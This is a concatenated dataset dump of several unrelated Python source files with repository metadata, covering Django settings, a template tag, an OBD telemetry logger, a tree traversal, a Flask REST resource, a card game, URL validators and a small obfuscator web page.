if "DATABASE_URL" in os.environ:
DATABASES = {
"default": dj_database_url.parse(os.environ["DATABASE_URL"]),
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = [
os.path.join(PROJECT_DIR, "static"),
]
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = "/static/"
# Media storage
if aws_storage_bucket_name := os.getenv("AWS_STORAGE_BUCKET_NAME"):
AWS_STORAGE_BUCKET_NAME = aws_storage_bucket_name
DEFAULT_FILE_STORAGE = "storages.backends.s3boto3.S3Boto3Storage"
AWS_ACCESS_KEY_ID = os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_S3_REGION_NAME = os.getenv("AWS_S3_REGION_NAME")
AWS_S3_CUSTOM_DOMAIN = os.getenv("AWS_S3_CUSTOM_DOMAIN")
AWS_LOCATION = os.getenv("AWS_LOCATION", "")
# Lines below this are likely only relevant for using Minio locally
AWS_S3_ENDPOINT_URL = os.getenv("AWS_S3_ENDPOINT_URL")
AWS_S3_USE_SSL = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
AWS_S3_SECURE_URLS = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
# Wagtail settings
WAGTAIL_SITE_NAME = "wagtail_template"
# Search
# https://docs.wagtail.org/en/stable/topics/search/backends.html
WAGTAILSEARCH_BACKENDS = {
"default": {
"BACKEND": "wagtail.search.backends.database",
}
}
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = os.getenv("BASE_URL", "")
ALLOWED_HOSTS = os.getenv("ALLOWED_HOSTS", "").split(",")
SECRET_KEY = os.getenv("SECRET_KEY", "")
# Error reporting
# https://docs.sentry.io/platforms/python/guides/django/
# https://glitchtip.com/sdkdocs/python-django
if sentry_dsn := os.getenv("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.utils import get_default_release
SENTRY_ENVIRONMENT = DJANGO_ENV
# Attempt to get release version from Sentry's utils and a couple other environment variables
def get_release_version():
release = get_default_release()
# Use GIT_REV for Dokku
release = release or os.getenv("GIT_REV")
# Use DJANGO_ENV as a final fallback
return release or DJANGO_ENV
SENTRY_ARGS = {
"dsn": sentry_dsn,
"integrations": [DjangoIntegration()],
"environment": SENTRY_ENVIRONMENT,
"release": get_release_version(),
"traces_sample_rate": 0.01,
}
# Auto session tracking is not supported by GlitchTip
if "sentry.io" in sentry_dsn:
SENTRY_ARGS["auto_session_tracking"] = True
else:
SENTRY_ARGS["auto_session_tracking"] = False
sentry_sdk.init(**SENTRY_ARGS)
# Enables URL to test Sentry integration
ENABLE_SENTRY_TEST_URL = (
os.environ.get("ENABLE_SENTRY_TEST_URL", "false").lower() == "true"
)
| 209 | 0 | 26 |
243d131c3f4dd5c382d0fd89e7593090e1cd85cd | 1,195 | py | Python | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement
from django import template
from ..models import Seat
register = template.Library()
@register.filter
@register.inclusion_tag('seat.html', takes_context=True)
| 31.447368 | 125 | 0.681172 | from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement
from django import template
from ..models import Seat
register = template.Library()
@register.filter
def split(value):
return value.split()
@register.inclusion_tag('seat.html', takes_context=True)
def seat(context, room, table):
# this should not happen with valid template
if room not in Seat.ROOMS:
raise Exception('"{}" is not valid room'.format(room))
if not table:
raise Exception('"{}" is not valid table'.format(table))
# use form.seat_counts to store counters
# it is always the same with different copies of context
if not hasattr(context['form'], 'seat_counts'):
context['form'].seat_counts = {}
rt = '{}-{}'.format(room, table)
s = context['form'].seat_counts[rt] = context['form'].seat_counts.get(rt, 0) + 1
seat = Seat.objects.get_or_create(room=room, table=table, seat=s)[0]
seat_context = {}
seat_context['seat'] = seat
try:
seat_context['variant'] = context['form']['seat-{}-variant'.format(seat.id)]
except KeyError:
pass
return seat_context
| 859 | 0 | 44 |
2e6006e584a17825353e404af334a6f750425bb8 | 911 | py | Python | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | 1 | 2022-01-17T22:46:02.000Z | 2022-01-17T22:46:02.000Z | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | null | null | null | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | null | null | null | import threading
import os
import obd
from random import random
from pathlib import Path
conn = obd.OBD()
connect = obd.Async(fast=False)
speed=""
fueli=""
tem =""
connect.watch(obd.commands.INTAKE_TEMP,callback=get_temp)
connect.watch(obd.commands.FUEL_LEVEL,callback=get_fuel)
connect.watch(obd.commands.SPEED,callback=get_speed)
while True:
tempz = open("temp.txt","w+")
fuel1 = open("fuel.txt","w+")
speed1 = open("speed.txt","w+")
speed1.write(speed)
tempz.write(tem)
fuel1.write(fueli)
print(speed)
| 15.706897 | 57 | 0.607025 | import threading
import os
import obd
from random import random
from pathlib import Path
conn = obd.OBD()
connect = obd.Async(fast=False)
speed=""
fueli=""
tem =""
def get_temp(t):
if not t.is_null():
tem=str(t.value)
if t.is_null():
tem=str(0)
def get_fuel(f):
if not f.is_null():
fueli=str(f.value)
if f.is_null():
fueli= str(0)
def get_speed(s):
if not s.is_null():
speed = str(s.value)
if s.is_null():
speed = str(0)
connect.watch(obd.commands.INTAKE_TEMP,callback=get_temp)
connect.watch(obd.commands.FUEL_LEVEL,callback=get_fuel)
connect.watch(obd.commands.SPEED,callback=get_speed)
while True:
tempz = open("temp.txt","w+")
fuel1 = open("fuel.txt","w+")
speed1 = open("speed.txt","w+")
speed1.write(speed)
tempz.write(tem)
fuel1.write(fueli)
print(speed)
| 278 | 0 | 68 |
62d5047c4d6f556bef84c17d674c5de797b2b02f | 189 | py | Python | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | # Core Library
import logging
# Third party
from gym.envs.registration import register
logger = logging.getLogger(__name__)
register(id="Mouse-v0", entry_point="gym_mouse.envs:MouseEnv") | 21 | 62 | 0.793651 | # Core Library
import logging
# Third party
from gym.envs.registration import register
logger = logging.getLogger(__name__)
register(id="Mouse-v0", entry_point="gym_mouse.envs:MouseEnv") | 0 | 0 | 0 |
9af56af6b43afee1d873a3caf8046bff62a1f68a | 975 | py | Python | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | #Given an n-ary tree,
# return the postorder
# traversal of its nodes' values.
#Recursion is easy to implement and understand by definition
# https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)
| 26.351351 | 73 | 0.558974 | #Given an n-ary tree,
# return the postorder
# traversal of its nodes' values.
#Recursion is easy to implement and understand by definition
# https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)
class Solution:
def postorder(self,root):
"""
:type:root :node
:rtype:list[int]
"""
res = []
if root == None:
return res
def recursion(root,res):
for child in root.children:
recursion(child,res)
res.append(root.val)
recursion(root,res)
return res
#iteration is basically pre order traversal but rather than go right
# first and then reverse its result
def postorder1(self,root):
res = []
if root = None:
return res
stack = [root]
while stack:
curr = stack.pop()
res.append(curr.val)
stack.extend(curr.children)
return res[::-1]
| 360 | 384 | 22 |
ebf21320142be0bab15ccda9ee4a55b1fe2b60a5 | 3,030 | py | Python | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | from flask_restful import Resource, reqparse, request
from flask_restful import fields, marshal_with, marshal
from sqlalchemy.exc import IntegrityError
from sqlalchemy import or_, and_, text
from flask_jwt_extended import jwt_required
from models.keyword import Keyword
from app import db
from utils.util import max_res
from helpers.keywords_resource_helper import * | 30.918367 | 125 | 0.588779 | from flask_restful import Resource, reqparse, request
from flask_restful import fields, marshal_with, marshal
from sqlalchemy.exc import IntegrityError
from sqlalchemy import or_, and_, text
from flask_jwt_extended import jwt_required
from models.keyword import Keyword
from app import db
from utils.util import max_res
from helpers.keywords_resource_helper import *
class KeywordsResource(Resource):
@jwt_required
def get(self, keyword_id=None):
if keyword_id:
keyword = Keyword.find_by_id(keyword_id)
return max_res(marshal(keyword, keyword_fields))
else:
conditions = []
args = keyword_query_parser.parse_args()
page = args['page']
per_page = args['pagesize']
if args['orderby'] not in sortable_fields:
return max_res('', code=500, errmsg='排序非法字段')
sort = args['orderby']
if args['desc']>0:
sort = args['orderby'] + ' desc'
conditions = make_conditions(conditions,args)
# 在这里添加更多的 条件查询 例如
# if args['name'] is not None:
# conditions.append(Keyword.name.like('%'+args['name']+'%'))
if conditions is []:
pagination = Keyword.query.order_by(text(sort)).paginate(page, per_page, error_out=False)
else:
pagination = Keyword.query.filter(*conditions).order_by(text(sort)).paginate(page, per_page, error_out=False)
paginate = {
'total':pagination.total,
'pageSize': pagination.per_page,
'current': pagination.page
}
print(pagination.items)
return max_res(marshal({
'pagination': paginate,
'list': [marshal(u, keyword_fields) for u in pagination.items]
}, keyword_list_fields))
@jwt_required
def post(self):
args = keyword_post_parser.parse_args()
keyword = Keyword(**args)
try:
keyword.add()
except IntegrityError:
return max_res('', code=401, errmsg='名称重复')
return max_res(marshal(keyword, keyword_fields))
def put(self, keyword_id=None):
keyword = Keyword.find_by_id(keyword_id)
args = keyword_update_parser.parse_args()
keyword = update_all_fields(args, keyword)
#可以在这里继续添加 需要更新的字段 如
# if args['name']:
# o.name = args['name']
#
db.session.commit()
try:
keyword.update()
except Exception as e:
return max_res('',500, 'Failed to modify.')
return max_res(marshal(keyword, keyword_fields))
def delete(self, keyword_id=None):
keyword = Keyword.find_by_id(keyword_id)
try:
keyword.delete()
except Exception as e:
return max_res('',500, 'The record has already deleted.')
return max_res('The keyword has been deleted.') | 2,555 | 166 | 23 |
741231e4e762030a801183488d2c8a85666d9f67 | 1,785 | py | Python | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | import os
directory = os.path.dirname(__file__)
| 30.254237 | 79 | 0.547899 | import os
directory = os.path.dirname(__file__)
def load(settings):
from hardhat.util import load_recipes
recipes = load_recipes(directory, 'hardhat.recipes.python')
dependencies = [
# only one version of cython is needed so alias it
['cython', 'python3-cython'], # alias
['devpi', 'python3-devpi-client',
'python3-devpi-server',
'python3-devpi-web'],
['guess-renames', 'python2-guess-renames'],
['hg-git', 'python2-hg-git'], # alias
['meld', 'python2-meld'],
['nuitka', 'python2-nuitka'],
['tortoisehg', 'python2-tortoisehg'],
]
for recipe in recipes:
recipe = recipe(settings=settings)
for python in recipe.pythons:
name = python + '-' + recipe.name
if not hasattr(recipe, 'depends'):
recipe.depends = []
# Get dependencies and replace 'python-' prefix with current python
# version for this recipe ('python2-' or 'python3-')
depends = list(recipe.depends)
for i in range(len(depends)):
dep = depends[i]
if dep.startswith('python-'):
depends[i] = python + dep[len('python'):]
depends.insert(0, name)
dependencies.append(depends)
for d in dependencies:
if needs_python(d, 2):
d += ['python2']
elif needs_python(d, 3):
d += ['python3']
return (recipes, dependencies)
def needs_python(depends, version):
needs = False
has = False
for d in depends:
if d.startswith('python%s-' % version):
needs = True
elif d == 'python%s' % version:
has = True
return needs and not has
| 1,688 | 0 | 46 |
2051c4639387560e84e8d243f881177997e1a1f1 | 1,069 | py | Python | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 26 | 2015-10-17T11:30:35.000Z | 2021-03-22T07:46:36.000Z | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 10 | 2015-05-10T22:51:35.000Z | 2017-09-15T10:00:33.000Z | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 16 | 2015-08-16T07:13:37.000Z | 2021-12-09T12:08:56.000Z | import os, sys, cyclone.web
import pyobf
from twisted.python import log
from twisted.internet import reactor
if __name__ == "__main__":
log.startLogging(sys.stdout)
port = int(os.environ.get('PORT', 5000))
reactor.listenTCP(port, Application())
reactor.run()
| 28.891892 | 122 | 0.626754 | import os, sys, cyclone.web
import pyobf
from twisted.python import log
from twisted.internet import reactor
class IndexHandler(cyclone.web.RequestHandler):
def get(self):
self.render("index.html", original="", obfuscated="", originalLen=0, obfLen=0)
def post(self):
string = self.get_argument("original", None)
obf = pyobf.Obfuscator(string)
obfuscated = obf.build_simple()
self.render("index.html", original=string, obfuscated=obfuscated, originalLen=len(string), obfLen=len(obfuscated))
class Application(cyclone.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
]
settings = {
"debug": True,
"static_path": "./static",
"template_path": "./template",
}
cyclone.web.Application.__init__(self,
handlers, **settings)
if __name__ == "__main__":
log.startLogging(sys.stdout)
port = int(os.environ.get('PORT', 5000))
reactor.listenTCP(port, Application())
reactor.run()
| 619 | 48 | 125 |
ceb1eeaa4872baf6c67cf9b0a43f35e96e62a66b | 1,569 | py | Python | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | 1 | 2019-09-20T07:36:15.000Z | 2019-09-20T07:36:15.000Z | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | 20 | 2018-10-05T09:00:23.000Z | 2022-03-31T01:53:32.000Z | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | null | null | null | """This file defines a URL validators based on Django ones.
"""
import re
# ----------------------------------------------------------------------------------------------------------------------
""" this regex is different from the one defined by Django because:
- in our case protocol is optional
- I decided that localhost is not a valid URL. This is a design decision that may be changed in future.
"""
url_regex = re.compile(
r'^((?:http|ftp)s?://)?' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
""" When doing a redirect, we need a URL with a protocol and using regex seems to be a simplest way of doing that
"""
redirect_url_regex = re.compile(
r'^(?:http|ftp)s?://.*$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
| 37.357143 | 120 | 0.361377 | """This file defines a URL validators based on Django ones.
"""
import re
# ----------------------------------------------------------------------------------------------------------------------
""" this regex is different from the one defined by Django because:
- in our case protocol is optional
- I decided that localhost is not a valid URL. This is a design decision that may be changed in future.
"""
url_regex = re.compile(
r'^((?:http|ftp)s?://)?' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
def valid_url(url):
return bool(url_regex.match(url))
# ----------------------------------------------------------------------------------------------------------------------
""" When doing a redirect, we need a URL with a protocol and using regex seems to be a simplest way of doing that
"""
redirect_url_regex = re.compile(
r'^(?:http|ftp)s?://.*$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
def valid_url_for_redirect(url):
return bool(redirect_url_regex.match(url))
# ----------------------------------------------------------------------------------------------------------------------
| 94 | 0 | 46 |
444bde82d6fd488d23f00861a4f896b303889cbc | 7,111 | py | Python | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.6
import random
def init():
'''
This builds the deck to draw from.
This runs at the beginning of the program then shoud only be run
to start a new game.
'''
# These are the possible face values and suits for the cards.
cardfaces = ("A","K","Q","J","10","9","8","7","6","5","4","3","2")
cardsuits = ("H","S","D","C")
# This section builds the cards with their assigned suits
# ex. thisdeck = [AH, KH, QH, ...]
thisdeck = []
complete_deck = []
for suit in cardsuits:
for face in cardfaces:
thisdeck.append(face+suit)
# This section takes the completed deck and assigns each card to a tuple
# This tuple has the generated card value and suit at complete_deck[*]
# The card's numeric stregnth is stored in complete_deck[*][*]
# A = 14, K = 13, Q = 12, J = 11
# ex. complete_deck = [(AH, 14), (KH, 13), (QH, 12), ... ]
for card in thisdeck:
card_value = ''
for value in card:
if value == 'D' or value == 'S' or value == 'C' or value == 'H':
break
elif value == 'A' or value == 'K' or value == 'Q' or value == 'J':
if value == 'A':
card_value = 14
elif value == 'K':
card_value = 13
elif value == 'Q':
card_value = 12
else:
card_value = 11
else:
card_value = card_value + str(value)
complete_deck.append((card, int(card_value)))
return complete_deck
def shuffle(mycards):
'''
This takes the input list and shuffles it.
In war.py it is used to shuffle decks of cards stord in lists.
Requires import random.
'''
unshuffled = mycards
shuffled = []
for count in range (0,len(unshuffled)):
pick = ''
while (pick == ''):
pick = random.choice(unshuffled)
shuffled.append(pick)
unshuffled.remove(pick)
return shuffled
def startinghands(deck):
'''
This function divides the availible cards to the two players.
'''
hand0 = []
hand1 = []
count = 0
for deal in range(0,len(deck)):
# Switch the target player when dealing each card.
# This reflects a real card deal.
if count % 2 == 0:
hand0.append(deck[deal])
else:
hand1.append(deck[deal])
# instead of .append() I may want to use insert to place new cards at
# the front of the list. This would reflect a real deal even closer.
count += 1
return (hand0, hand1)
def print_hands(p1hand, p2hand):
'''
This prints the current hands for the players.
It only prints the face value and suit.
It does not print the converted value for the card.
'''
print ('Player 1 has', len(p1hand), 'card(s): ')
for card_pair in p1hand:
print (card_pair[0], end=' ')
print('\n')
print ('Player 2 has', len(p2hand), 'card(s): ')
for card_pair in p2hand:
print (card_pair[0], end=' ')
print('\n')
def fight(hand1, hand2):
'''
This function is the core for comparing the cards
The function expects 2 lists of tuples containing the players hands.
example input: [(AH, 14), (KH, 13), (QH, 12), ... ]
'''
card1 = ''
card2 = ''
player1loot = []
player2loot = []
while hand1 != [] and hand2 != []:
while hand1 != [] and hand2 != []:
print ()
print ('Card pair: ')
print ('Player 1: ', hand1[0][0])
print ('Player 2: ', hand2[0][0])
# #################################
# #######TO DO#####################
if hand1[0][0] == hand2[0][0]:
# war(hand1, hand2, player1loot, player2loot)
hand1.pop(0)
hand2.pop(0)
# #####COMPLETE WAR FUNCTION ABOVE#
# #################################
elif hand1 > hand2:
print ('Player 1 wins hand')
player1loot.append(hand1[0])
player1loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
else:
print ('Player 2 wins hand')
player2loot.append(hand1[0])
player2loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
'''
# uncomment below lines to see how cards move during shuffling process
# see below comment block too!
print ('-------------------Before Shuffle-------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# ??????Why does this blank the list used for the argument???
if hand1 == []:
print('Shuffling player 1\'s hand')
hand1 = shuffle(player1loot)
else:
pass
if hand2 == []:
print('Shuffling player 2\'s hand')
hand2 = shuffle(player2loot)
else:
pass
'''
# uncomment below lines to see how cards move during shuffling process
# see above comment block too!
print ('-------------------After Shuffle--------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# check to see if player hand is still empty after shuffle
# if it is other player wins!!
if hand1 == []:
print ('Player 2 Wins!!')
else:
pass
if hand2 == []:
print ('Player 1 Wins!!')
else:
pass
def war(hand1, hand2, player1loot, player2loot):
'''
If two cards match in the war function this one resolves the tie.
'''
print ('WAR!!!')
print ('P1 card: ', hand1[0][0], 'P2 card: ', hand2[0][0])
print ('Cards on the line: ')
print (' P1 P2')
for card in range(3):
print (' ', hand1[card][0], hand2[card][0]
if __name__ == '__main__':
# These lines start the game and initialize the deck and player's hands.
cards = init()
cards = shuffle(cards)
cards = startinghands(cards)
p1hand = cards[0]
p2hand = cards[1]
# ######################################################################
# This will print the players starting hands.
print_hands(p1hand, p2hand)
fight(p1hand, p2hand)
| 30.650862 | 78 | 0.50682 | #!/usr/bin/env python3.6
import random
def init():
'''
This builds the deck to draw from.
This runs at the beginning of the program then shoud only be run
to start a new game.
'''
# These are the possible face values and suits for the cards.
cardfaces = ("A","K","Q","J","10","9","8","7","6","5","4","3","2")
cardsuits = ("H","S","D","C")
# This section builds the cards with their assigned suits
# ex. thisdeck = [AH, KH, QH, ...]
thisdeck = []
complete_deck = []
for suit in cardsuits:
for face in cardfaces:
thisdeck.append(face+suit)
# This section takes the completed deck and assigns each card to a tuple
# This tuple has the generated card value and suit at complete_deck[*]
# The card's numeric stregnth is stored in complete_deck[*][*]
# A = 14, K = 13, Q = 12, J = 11
# ex. complete_deck = [(AH, 14), (KH, 13), (QH, 12), ... ]
for card in thisdeck:
card_value = ''
for value in card:
if value == 'D' or value == 'S' or value == 'C' or value == 'H':
break
elif value == 'A' or value == 'K' or value == 'Q' or value == 'J':
if value == 'A':
card_value = 14
elif value == 'K':
card_value = 13
elif value == 'Q':
card_value = 12
else:
card_value = 11
else:
card_value = card_value + str(value)
complete_deck.append((card, int(card_value)))
return complete_deck
def shuffle(mycards):
'''
This takes the input list and shuffles it.
In war.py it is used to shuffle decks of cards stord in lists.
Requires import random.
'''
unshuffled = mycards
shuffled = []
for count in range (0,len(unshuffled)):
pick = ''
while (pick == ''):
pick = random.choice(unshuffled)
shuffled.append(pick)
unshuffled.remove(pick)
return shuffled
def startinghands(deck):
'''
This function divides the availible cards to the two players.
'''
hand0 = []
hand1 = []
count = 0
for deal in range(0,len(deck)):
# Switch the target player when dealing each card.
# This reflects a real card deal.
if count % 2 == 0:
hand0.append(deck[deal])
else:
hand1.append(deck[deal])
# instead of .append() I may want to use insert to place new cards at
# the front of the list. This would reflect a real deal even closer.
count += 1
return (hand0, hand1)
def print_hands(p1hand, p2hand):
'''
This prints the current hands for the players.
It only prints the face value and suit.
It does not print the converted value for the card.
'''
print ('Player 1 has', len(p1hand), 'card(s): ')
for card_pair in p1hand:
print (card_pair[0], end=' ')
print('\n')
print ('Player 2 has', len(p2hand), 'card(s): ')
for card_pair in p2hand:
print (card_pair[0], end=' ')
print('\n')
def fight(hand1, hand2):
'''
This function is the core for comparing the cards
The function expects 2 lists of tuples containing the players hands.
example input: [(AH, 14), (KH, 13), (QH, 12), ... ]
'''
card1 = ''
card2 = ''
player1loot = []
player2loot = []
while hand1 != [] and hand2 != []:
while hand1 != [] and hand2 != []:
print ()
print ('Card pair: ')
print ('Player 1: ', hand1[0][0])
print ('Player 2: ', hand2[0][0])
# #################################
# #######TO DO#####################
if hand1[0][0] == hand2[0][0]:
# war(hand1, hand2, player1loot, player2loot)
hand1.pop(0)
hand2.pop(0)
# #####COMPLETE WAR FUNCTION ABOVE#
# #################################
elif hand1 > hand2:
print ('Player 1 wins hand')
player1loot.append(hand1[0])
player1loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
else:
print ('Player 2 wins hand')
player2loot.append(hand1[0])
player2loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
'''
# uncomment below lines to see how cards move during shuffling process
# see below comment block too!
print ('-------------------Before Shuffle-------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# ??????Why does this blank the list used for the argument???
if hand1 == []:
print('Shuffling player 1\'s hand')
hand1 = shuffle(player1loot)
else:
pass
if hand2 == []:
print('Shuffling player 2\'s hand')
hand2 = shuffle(player2loot)
else:
pass
'''
# uncomment below lines to see how cards move during shuffling process
# see above comment block too!
print ('-------------------After Shuffle--------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# check to see if player hand is still empty after shuffle
# if it is other player wins!!
if hand1 == []:
print ('Player 2 Wins!!')
else:
pass
if hand2 == []:
print ('Player 1 Wins!!')
else:
pass
def war(hand1, hand2, player1loot, player2loot):
'''
If two cards match in the war function this one resolves the tie.
'''
print ('WAR!!!')
print ('P1 card: ', hand1[0][0], 'P2 card: ', hand2[0][0])
print ('Cards on the line: ')
print (' P1 P2')
for card in range(3):
print (' ', hand1[card][0], hand2[card][0]
if __name__ == '__main__':
# These lines start the game and initialize the deck and player's hands.
cards = init()
cards = shuffle(cards)
cards = startinghands(cards)
p1hand = cards[0]
p2hand = cards[1]
# ######################################################################
# This will print the players starting hands.
print_hands(p1hand, p2hand)
fight(p1hand, p2hand)
| 0 | 0 | 0 |
0221ddaeac067a10aac025cefb09e848688bdbb3 | 3,467 | py | Python | wearebeautiful/database.py | wearebeautiful/wearebeautiful.info | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 1 | 2019-07-20T10:17:14.000Z | 2019-07-20T10:17:14.000Z | wearebeautiful/database.py | wearebeautiful/wearebeautiful-tools | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 26 | 2020-02-17T17:42:49.000Z | 2020-04-17T21:24:52.000Z | wearebeautiful/database.py | wearebeautiful/wearebeautiful-tools | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 1 | 2019-08-14T19:23:33.000Z | 2019-08-14T19:23:33.000Z | import os
import json
import shutil
from peewee import SqliteDatabase
from wearebeautiful.db_model import DBModel, db, create_from_manifest
from wearebeautiful.manifest import validate_manifest
import config
DB_FILE = "wab-models.db"
MIN_SURFACE_MED_SIZE = 8 * 1024 * 1024
MAX_SURFACE_MED_SIZE = 12 * 1024 * 1024
MIN_SURFACE_LOW_SIZE = 1.5 * 1024 * 1024
